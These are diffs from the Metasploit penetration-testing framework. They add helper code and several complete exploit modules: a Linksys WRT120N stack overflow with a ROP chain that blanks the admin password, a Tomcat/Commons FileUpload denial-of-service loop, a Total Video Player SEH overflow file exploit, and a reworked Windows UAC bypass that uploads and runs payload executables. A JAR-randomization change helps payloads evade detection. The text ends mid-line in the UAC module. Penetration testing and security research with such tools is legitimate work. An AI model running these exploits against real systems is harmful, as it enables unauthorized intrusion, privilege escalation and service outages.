|
# @return [Rex::Zip::Jar]
|
||||||
def generate_jar(opts={})
|
def generate_jar(opts={})
|
||||||
raise if not respond_to? :config
|
raise if not respond_to? :config
|
||||||
|
@ -54,6 +56,7 @@ module Msf::Payload::Java
|
||||||
] + @class_files
|
] + @class_files
|
||||||
|
|
||||||
jar = Rex::Zip::Jar.new
|
jar = Rex::Zip::Jar.new
|
||||||
|
jar.add_sub("metasploit") if opts[:random]
|
||||||
jar.add_file("metasploit.dat", config)
|
jar.add_file("metasploit.dat", config)
|
||||||
jar.add_files(paths, File.join(Msf::Config.data_directory, "java"))
|
jar.add_files(paths, File.join(Msf::Config.data_directory, "java"))
|
||||||
jar.build_manifest(:main_class => main_class)
|
jar.build_manifest(:main_class => main_class)
|
||||||
|
|
|
@ -120,6 +120,23 @@ module Msf::Post::Common
|
||||||
return o
|
return o
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def cmd_exec_get_pid(cmd, args=nil, time_out=15)
|
||||||
|
case session.type
|
||||||
|
when /meterpreter/
|
||||||
|
if args.nil? and cmd =~ /[^a-zA-Z0-9\/._-]/
|
||||||
|
args = ""
|
||||||
|
end
|
||||||
|
session.response_timeout = time_out
|
||||||
|
process = session.sys.process.execute(cmd, args, {'Hidden' => true, 'Channelized' => true})
|
||||||
|
process.channel.close
|
||||||
|
pid = process.pid
|
||||||
|
process.close
|
||||||
|
pid
|
||||||
|
else
|
||||||
|
print_error "cmd_exec_get_pid is incompatible with non-meterpreter sessions"
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Reports to the database that the host is a virtual machine and reports
|
# Reports to the database that the host is a virtual machine and reports
|
||||||
# the type of virtual machine it is (e.g VirtualBox, VMware, Xen)
|
# the type of virtual machine it is (e.g VirtualBox, VMware, Xen)
|
||||||
|
|
|
@ -824,10 +824,15 @@ class Db
|
||||||
tbl = Rex::Ui::Text::Table.new(tbl_opts)
|
tbl = Rex::Ui::Text::Table.new(tbl_opts)
|
||||||
|
|
||||||
creds_returned = 0
|
creds_returned = 0
|
||||||
|
inactive_count = 0
|
||||||
# Now do the actual search
|
# Now do the actual search
|
||||||
framework.db.each_cred(framework.db.workspace) do |cred|
|
framework.db.each_cred(framework.db.workspace) do |cred|
|
||||||
# skip if it's inactive and user didn't ask for all
|
# skip if it's inactive and user didn't ask for all
|
||||||
next unless (cred.active or inactive_ok)
|
if !cred.active && !inactive_ok
|
||||||
|
inactive_count += 1
|
||||||
|
next
|
||||||
|
end
|
||||||
|
|
||||||
if search_term
|
if search_term
|
||||||
next unless cred.attribute_names.any? { |a| cred[a.intern].to_s.match(search_term) }
|
next unless cred.attribute_names.any? { |a| cred[a.intern].to_s.match(search_term) }
|
||||||
end
|
end
|
||||||
|
@ -876,8 +881,15 @@ class Db
|
||||||
end
|
end
|
||||||
|
|
||||||
print_line
|
print_line
|
||||||
if (output_file == nil)
|
if output_file.nil?
|
||||||
print_line(tbl.to_s)
|
print_line(tbl.to_s)
|
||||||
|
if !inactive_ok && inactive_count > 0
|
||||||
|
# Then we're not printing the inactive ones. Let the user know
|
||||||
|
# that there are some they are not seeing and how to get at
|
||||||
|
# them.
|
||||||
|
print_line "Also found #{inactive_count} inactive creds (`creds all` to list them)"
|
||||||
|
print_line
|
||||||
|
end
|
||||||
else
|
else
|
||||||
# create the output file
|
# create the output file
|
||||||
::File.open(output_file, "wb") { |f| f.write(tbl.to_csv) }
|
::File.open(output_file, "wb") { |f| f.write(tbl.to_csv) }
|
||||||
|
|
|
@ -972,6 +972,7 @@ require 'msf/core/exe/segment_injector'
|
||||||
spawn = opts[:spawn] || 2
|
spawn = opts[:spawn] || 2
|
||||||
exe_name = Rex::Text.rand_text_alpha(8) + ".exe"
|
exe_name = Rex::Text.rand_text_alpha(8) + ".exe"
|
||||||
zip = Rex::Zip::Jar.new
|
zip = Rex::Zip::Jar.new
|
||||||
|
zip.add_sub("metasploit") if opts[:random]
|
||||||
paths = [
|
paths = [
|
||||||
[ "metasploit", "Payload.class" ],
|
[ "metasploit", "Payload.class" ],
|
||||||
]
|
]
|
||||||
|
|
|
@ -15,6 +15,17 @@ module Zip
|
||||||
#
|
#
|
||||||
class Jar < Archive
|
class Jar < Archive
|
||||||
attr_accessor :manifest
|
attr_accessor :manifest
|
||||||
|
# @!attribute [rw] substitutions
|
||||||
|
# The substitutions to apply when randomizing. Randomization is designed to
|
||||||
|
# be used in packages and/or classes names.
|
||||||
|
#
|
||||||
|
# @return [Hash]
|
||||||
|
attr_accessor :substitutions
|
||||||
|
|
||||||
|
def initialize
|
||||||
|
@substitutions = {}
|
||||||
|
super
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Create a MANIFEST.MF file based on the current Archive#entries.
|
# Create a MANIFEST.MF file based on the current Archive#entries.
|
||||||
|
@ -35,8 +46,8 @@ class Jar < Archive
|
||||||
# The SHA1-Digest lines are optional unless the jar is signed (see #sign).
|
# The SHA1-Digest lines are optional unless the jar is signed (see #sign).
|
||||||
#
|
#
|
||||||
def build_manifest(opts={})
|
def build_manifest(opts={})
|
||||||
main_class = opts[:main_class] || nil
|
main_class = (opts[:main_class] ? randomize(opts[:main_class]) : nil)
|
||||||
app_name = opts[:app_name] || nil
|
app_name = (opts[:app_name] ? randomize(opts[:main_class]) : nil)
|
||||||
existing_manifest = nil
|
existing_manifest = nil
|
||||||
|
|
||||||
@manifest = "Manifest-Version: 1.0\r\n"
|
@manifest = "Manifest-Version: 1.0\r\n"
|
||||||
|
@ -224,6 +235,47 @@ class Jar < Archive
|
||||||
return true
|
return true
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Adds a file to the JAR, randomizing the file name
|
||||||
|
# and the contents.
|
||||||
|
#
|
||||||
|
# @see Rex::Zip::Archive#add_file
|
||||||
|
def add_file(fname, fdata=nil, xtra=nil, comment=nil)
|
||||||
|
super(randomize(fname), randomize(fdata), xtra, comment)
|
||||||
|
end
|
||||||
|
|
||||||
|
# Adds a substitution to have into account when randomizing. Substitutions
|
||||||
|
# must be added immediately after {#initialize}.
|
||||||
|
#
|
||||||
|
# @param str [String] String to substitute. It's designed to randomize
|
||||||
|
# class and/or package names.
|
||||||
|
# @param bad [String] String containing bad characters to avoid when
|
||||||
|
# applying substitutions.
|
||||||
|
# @return [String] The substitution which will be used when randomizing.
|
||||||
|
def add_sub(str, bad = '')
|
||||||
|
if @substitutions.key?(str)
|
||||||
|
return @substitutions[str]
|
||||||
|
end
|
||||||
|
|
||||||
|
@substitutions[str] = Rex::Text.rand_text_alpha(str.length, bad)
|
||||||
|
end
|
||||||
|
|
||||||
|
# Randomizes an input by applying the `substitutions` available.
|
||||||
|
#
|
||||||
|
# @param str [String] String to randomize.
|
||||||
|
# @return [String] The input `str` with all the possible `substitutions`
|
||||||
|
# applied.
|
||||||
|
def randomize(str)
|
||||||
|
return str if str.nil?
|
||||||
|
|
||||||
|
random = str
|
||||||
|
|
||||||
|
@substitutions.each do |orig, subs|
|
||||||
|
random = str.gsub(orig, subs)
|
||||||
|
end
|
||||||
|
|
||||||
|
random
|
||||||
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -0,0 +1,109 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Linksys WRT120N tmUnblock Buffer Overflow',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a buffer overflow vulnerability in the WRT120N Linksys router
|
||||||
|
to reset the password of the management interface temporarily to an empty value.
|
||||||
|
This module has been tested successfully on a WRT120N device with firmware version
|
||||||
|
1.0.07.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Craig Heffner', #vulnerability discovery and original exploit
|
||||||
|
'Michael Messner <devnull[at]s3cur1ty.de>' #metasploit module
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'EDB', '31758' ],
|
||||||
|
[ 'OSVDB', '103521' ],
|
||||||
|
[ 'URL', 'http://www.devttys0.com/2014/02/wrt120n-fprintf-stack-overflow/' ] # a huge amount of details about this vulnerability and the original exploit
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Feb 19 2014'))
|
||||||
|
end
|
||||||
|
|
||||||
|
def check_login(user)
|
||||||
|
print_status("#{peer} - Trying to login with #{user} and empty password")
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => '/',
|
||||||
|
'method' => 'GET',
|
||||||
|
'authorization' => basic_auth(user,"")
|
||||||
|
})
|
||||||
|
if res.nil? || res.code == 404
|
||||||
|
print_status("#{peer} - No successful login possible with #{user} and empty password")
|
||||||
|
return false
|
||||||
|
elsif [200, 301, 302].include?(res.code)
|
||||||
|
print_good("#{peer} - Successful login #{user} and empty password")
|
||||||
|
return true
|
||||||
|
else
|
||||||
|
print_status("#{peer} - No successful login possible with #{user} and empty password")
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
|
||||||
|
begin
|
||||||
|
if check_login("admin")
|
||||||
|
print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
rescue ::Rex::ConnectionError
|
||||||
|
print_error("#{peer} - Failed to connect to the web server")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("#{peer} - Resetting password for the admin user ...")
|
||||||
|
|
||||||
|
postdata = Rex::Text.rand_text_alpha(246) # Filler
|
||||||
|
postdata << [0x81544AF0].pack("N") # $s0, address of admin password in memory
|
||||||
|
postdata << [0x8031f634].pack("N") # $ra
|
||||||
|
postdata << Rex::Text.rand_text_alpha(40) # Stack filler
|
||||||
|
postdata << Rex::Text.rand_text_alpha(4) # Stack filler
|
||||||
|
postdata << [0x803471b8].pack("N") # ROP 1 $ra (address of ROP 2)
|
||||||
|
postdata << Rex::Text.rand_text_alpha(8) # Stack filler
|
||||||
|
|
||||||
|
(0..3).each do |i|
|
||||||
|
postdata << Rex::Text.rand_text_alpha(4) # ROP 2 $s0, don't care
|
||||||
|
postdata << Rex::Text.rand_text_alpha(4) # ROP 2 $s1, don't care
|
||||||
|
postdata << [0x803471b8].pack("N") # ROP 2 $ra (address of itself)
|
||||||
|
postdata << Rex::Text.rand_text_alpha(4-(3*(i/3))) # Stack filler
|
||||||
|
end
|
||||||
|
|
||||||
|
begin
|
||||||
|
res = send_request_cgi(
|
||||||
|
{
|
||||||
|
'uri' => normalize_uri("cgi-bin", "tmUnblock.cgi"),
|
||||||
|
'method' => 'POST',
|
||||||
|
'vars_post' => {
|
||||||
|
'period' => '0',
|
||||||
|
'TM_Block_MAC' => '00:01:02:03:04:05',
|
||||||
|
'TM_Block_URL' => postdata
|
||||||
|
}
|
||||||
|
})
|
||||||
|
if res and res.code == 500
|
||||||
|
if check_login("admin")
|
||||||
|
print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password")
|
||||||
|
else
|
||||||
|
print_status("#{peer} - Expected answer, but unknown exploiting status. Try to login with the user admin and a blank password")
|
||||||
|
end
|
||||||
|
else
|
||||||
|
print_error("#{peer} - Unexpected answer. Exploiting attempt has failed")
|
||||||
|
end
|
||||||
|
rescue ::Rex::ConnectionError
|
||||||
|
print_error("#{peer} - Failed to connect to the web server")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
|
@ -12,8 +12,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'John the Ripper Password Cracker (Fast Mode)',
|
'Name' => 'John the Ripper Password Cracker (Fast Mode)',
|
||||||
'Description' => %Q{
|
'Description' => %Q{
|
||||||
This module uses John the Ripper to identify weak passwords that have been
|
This module uses John the Ripper to identify weak passwords that have been
|
||||||
acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal
|
acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal
|
||||||
of this module is to find trivial passwords in a short amount of time. To
|
of this module is to find trivial passwords in a short amount of time. To
|
||||||
|
@ -21,8 +21,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
used outside of Metasploit. This initial version just handles LM/NTLM credentials
|
used outside of Metasploit. This initial version just handles LM/NTLM credentials
|
||||||
from hashdump and uses the standard wordlist and rules.
|
from hashdump and uses the standard wordlist and rules.
|
||||||
},
|
},
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE # JtR itself is GPLv2, but this wrapper is MSF (BSD)
|
'License' => MSF_LICENSE # JtR itself is GPLv2, but this wrapper is MSF (BSD)
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -68,6 +68,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
cracked_lm = {}
|
cracked_lm = {}
|
||||||
added = []
|
added = []
|
||||||
|
|
||||||
|
john_crack(hashlist.path, :wordlist => datastore['Wordlist'], :format => 'lm')
|
||||||
|
john_crack(hashlist.path, :wordlist => datastore['Wordlist'], :format => 'nt')
|
||||||
|
|
||||||
# Crack this in LANMAN format using wordlist mode with tweaked rules
|
# Crack this in LANMAN format using wordlist mode with tweaked rules
|
||||||
john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'lm')
|
john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'lm')
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,76 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit4 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Auxiliary::Dos
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',
|
||||||
|
'Description' => %q{
|
||||||
|
This module triggers an infinite loop in Apache Commons FileUpload 1.0
|
||||||
|
through 1.3 via a specially crafted Content-Type header.
|
||||||
|
Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle
|
||||||
|
mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
|
||||||
|
and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also
|
||||||
|
uses Commons FileUpload as part of the Manager application.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
|
||||||
|
'ribeirux' # metasploit module
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['CVE', '2014-0050'],
|
||||||
|
['URL', 'http://markmail.org/message/kpfl7ax4el2owb3o'],
|
||||||
|
['URL', 'http://tomcat.apache.org/security-8.html'],
|
||||||
|
['URL', 'http://tomcat.apache.org/security-7.html']
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Feb 6 2014'
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(8080),
|
||||||
|
OptString.new('TARGETURI', [ true, "The request URI", '/']),
|
||||||
|
OptInt.new('RLIMIT', [ true, "Number of requests to send",50])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
boundary = "0"*4092
|
||||||
|
opts = {
|
||||||
|
'method' => "POST",
|
||||||
|
'uri' => normalize_uri(target_uri.to_s),
|
||||||
|
'ctype' => "multipart/form-data; boundary=#{boundary}",
|
||||||
|
'data' => "#{boundary}00000",
|
||||||
|
'headers' => {
|
||||||
|
'Accept' => '*/*'
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for x in 1..datastore['RLIMIT']
|
||||||
|
print_status("Sending request #{x} to #{peer}")
|
||||||
|
begin
|
||||||
|
c = connect
|
||||||
|
r = c.request_cgi(opts)
|
||||||
|
c.send_request(r)
|
||||||
|
# Don't wait for a response
|
||||||
|
rescue ::Rex::ConnectionError => exception
|
||||||
|
print_error("#{peer} - Unable to connect: '#{exception.message}'")
|
||||||
|
return
|
||||||
|
ensure
|
||||||
|
disconnect(c) if c
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
|
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
res = r[0].to_s.strip
|
res = r[0].to_s.strip
|
||||||
if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/))
|
if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/))
|
||||||
print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)")
|
print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)")
|
||||||
report_service(:host => rhost, :port => rport, :name => "chargen", :info => res.length)
|
report_service(:host => rhost, :port => rport, :proto => "udp", :name => "chargen", :info => res.length)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
|
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
|
||||||
|
|
|
@ -134,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
# If we haven't returned yet, then this is a request for our applet
|
# If we haven't returned yet, then this is a request for our applet
|
||||||
# jar, build one for this victim.
|
# jar, build one for this victim.
|
||||||
jar = p.encoded_jar
|
jar = p.encoded_jar(:random => true)
|
||||||
|
|
||||||
jar.add_file("#{datastore["APPLETNAME"]}.class", @applet_class)
|
jar.add_file("#{datastore["APPLETNAME"]}.class", @applet_class)
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,73 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
Rank = NormalRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::FILEFORMAT
|
||||||
|
include Msf::Exploit::Seh
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability
|
||||||
|
occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\".
|
||||||
|
This module has been tested successfully over Windows WinXp-Sp3-EN, Windows 7, Windows 8.
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Mike Czumak', # (T_v3rn1x) -- @SecuritySift
|
||||||
|
'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>' # Metasploit module
|
||||||
|
],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'OSVDB', '100619' ],
|
||||||
|
[ 'EDB', '29799' ]
|
||||||
|
],
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'ExitFunction' => 'process',
|
||||||
|
},
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'BadChars' => "\x00\x0a\x0d\xff",
|
||||||
|
'Space' => 1787,
|
||||||
|
'DisableNops' => true,
|
||||||
|
},
|
||||||
|
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
[ 'Windows Universal',
|
||||||
|
{
|
||||||
|
'Ret' => 0x10012848, # pop ebx # pop ecx # ret - hskin.dll
|
||||||
|
'Offset' => 256
|
||||||
|
}
|
||||||
|
],
|
||||||
|
],
|
||||||
|
'Privileged' => false,
|
||||||
|
'DisclosureDate' => 'Nov 24 2013',
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
|
register_options([OptString.new('FILENAME', [ false, 'The file name.', 'Settings.ini']),], self.class)
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
|
||||||
|
buffer = "[Support Groups]\r\nVideo="
|
||||||
|
buffer << rand_text(target['Offset'])
|
||||||
|
buffer << generate_seh_payload(target.ret)
|
||||||
|
buffer << payload.encoded
|
||||||
|
buffer << "\r\n[AssociateType]\r\nAssociateType =1"
|
||||||
|
|
||||||
|
file_create(buffer)
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
|
@ -29,7 +29,10 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
],
|
],
|
||||||
'Platform' => [ 'win' ],
|
'Platform' => [ 'win' ],
|
||||||
'SessionTypes' => [ 'meterpreter' ],
|
'SessionTypes' => [ 'meterpreter' ],
|
||||||
'Targets' => [ [ 'Windows', {} ] ],
|
'Targets' => [
|
||||||
|
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||||
|
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||||
|
],
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
'References' => [
|
'References' => [
|
||||||
[ 'URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/' ]
|
[ 'URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/' ]
|
||||||
|
@ -39,54 +42,10 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def runas_method
|
|
||||||
payload = generate_payload_exe
|
|
||||||
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
|
||||||
tmpdir = expand_path("%TEMP%")
|
|
||||||
tempexe = tmpdir + "\\" + payload_filename
|
|
||||||
write_file(tempexe, payload)
|
|
||||||
print_status("Uploading payload: #{tempexe}")
|
|
||||||
session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
|
|
||||||
print_status("Payload executed")
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
|
|
||||||
|
|
||||||
#
|
|
||||||
# Verify use against Vista+
|
|
||||||
#
|
|
||||||
winver = sysinfo["OS"]
|
|
||||||
if winver !~ /Windows Vista|Windows 2008|Windows [78]/
|
|
||||||
fail_with(Exploit::Failure::NotVulnerable, "#{winver} is not vulnerable.")
|
|
||||||
end
|
|
||||||
|
|
||||||
if is_uac_enabled?
|
|
||||||
print_status "UAC is Enabled, checking level..."
|
|
||||||
else
|
|
||||||
if is_in_admin_group?
|
|
||||||
fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
|
|
||||||
else
|
|
||||||
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
case get_uac_level
|
|
||||||
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
|
|
||||||
fail_with(Exploit::Failure::NotVulnerable,
|
|
||||||
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
|
|
||||||
)
|
|
||||||
when UAC_DEFAULT
|
|
||||||
print_good "UAC is set to Default"
|
|
||||||
print_good "BypassUAC can bypass this setting, continuing..."
|
|
||||||
when UAC_NO_PROMPT
|
|
||||||
print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
|
|
||||||
runas_method
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
|
def check_permissions!
|
||||||
# Check if you are an admin
|
# Check if you are an admin
|
||||||
print_status('Checking admin status...')
|
vprint_status('Checking admin status...')
|
||||||
admin_group = is_in_admin_group?
|
admin_group = is_in_admin_group?
|
||||||
|
|
||||||
if admin_group.nil?
|
if admin_group.nil?
|
||||||
|
@ -103,18 +62,60 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
|
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
|
||||||
fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
|
fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
|
||||||
end
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
validate_environment!
|
||||||
|
|
||||||
|
case get_uac_level
|
||||||
|
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
|
||||||
|
fail_with(Exploit::Failure::NotVulnerable,
|
||||||
|
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
|
||||||
|
)
|
||||||
|
when UAC_DEFAULT
|
||||||
|
print_good "UAC is set to Default"
|
||||||
|
print_good "BypassUAC can bypass this setting, continuing..."
|
||||||
|
when UAC_NO_PROMPT
|
||||||
|
print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
|
||||||
|
runas_method
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
check_permissions!
|
||||||
|
|
||||||
|
upload_binaries!
|
||||||
|
|
||||||
|
cmd = "#{path_bypass} /c #{path_payload}"
|
||||||
|
# execute the payload
|
||||||
|
pid = cmd_exec_get_pid(cmd)
|
||||||
|
|
||||||
|
::Timeout.timeout(30) do
|
||||||
|
until session_created? do
|
||||||
|
select(nil,nil,nil,1)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
session.sys.process.kill(pid)
|
||||||
|
# delete the uac bypass payload
|
||||||
|
file_rm(path_bypass)
|
||||||
|
file_rm("#{expand_path("%TEMP%")}\\tior.exe")
|
||||||
|
cmd_exec("cmd.exe", "/c del \"#{expand_path("%TEMP%")}\\w7e*.tmp\"" )
|
||||||
|
end
|
||||||
|
|
||||||
|
def path_bypass
|
||||||
|
@bypass_path ||= "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.exe"
|
||||||
|
end
|
||||||
|
|
||||||
|
def path_payload
|
||||||
|
@payload_path ||= "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.exe"
|
||||||
|
end
|
||||||
|
|
||||||
|
def upload_binaries!
|
||||||
|
print_status("Uploaded the agent to the filesystem....")
|
||||||
#
|
#
|
||||||
# Generate payload and random names for upload
|
# Generate payload and random names for upload
|
||||||
#
|
#
|
||||||
payload = generate_payload_exe
|
payload = generate_payload_exe
|
||||||
|
|
||||||
# randomize the bypass_uac_filename
|
|
||||||
bypass_uac_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
|
||||||
|
|
||||||
# randomize the payload exe name
|
|
||||||
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
|
||||||
|
|
||||||
# path to the bypassuac binary
|
# path to the bypassuac binary
|
||||||
path = ::File.join(Msf::Config.data_directory, "post")
|
path = ::File.join(Msf::Config.data_directory, "post")
|
||||||
|
|
||||||
|
@ -126,36 +127,55 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
bpexe = ::File.join(path, "bypassuac-x86.exe")
|
bpexe = ::File.join(path, "bypassuac-x86.exe")
|
||||||
end
|
end
|
||||||
|
|
||||||
tmpdir = expand_path("%TEMP%")
|
|
||||||
cmd = "#{tmpdir}\\#{bypass_uac_filename} /c #{tmpdir}\\#{payload_filename}"
|
|
||||||
|
|
||||||
print_status("Uploading the bypass UAC executable to the filesystem...")
|
print_status("Uploading the bypass UAC executable to the filesystem...")
|
||||||
|
|
||||||
begin
|
begin
|
||||||
#
|
#
|
||||||
# Upload UAC bypass to the filesystem
|
# Upload UAC bypass to the filesystem
|
||||||
#
|
#
|
||||||
upload_file("#{tmpdir}\\#{bypass_uac_filename}", bpexe)
|
upload_file("#{path_bypass}", bpexe)
|
||||||
print_status("Meterpreter stager executable #{payload.length} bytes long being uploaded..")
|
print_status("Meterpreter stager executable #{payload.length} bytes long being uploaded..")
|
||||||
#
|
|
||||||
# Upload the payload to the filesystem
|
write_file(path_payload, payload)
|
||||||
#
|
|
||||||
tempexe = tmpdir + "\\" + payload_filename
|
|
||||||
write_file(tempexe, payload)
|
|
||||||
rescue ::Exception => e
|
rescue ::Exception => e
|
||||||
print_error("Error uploading file #{bypass_uac_filename}: #{e.class} #{e}")
|
print_error("Error uploading file #{path_bypass}: #{e.class} #{e}")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Uploaded the agent to the filesystem....")
|
|
||||||
|
|
||||||
# execute the payload
|
|
||||||
cmd_exec(cmd)
|
|
||||||
|
|
||||||
# delete the uac bypass payload
|
|
||||||
delete_file = "#{tmpdir}\\#{bypass_uac_filename}"
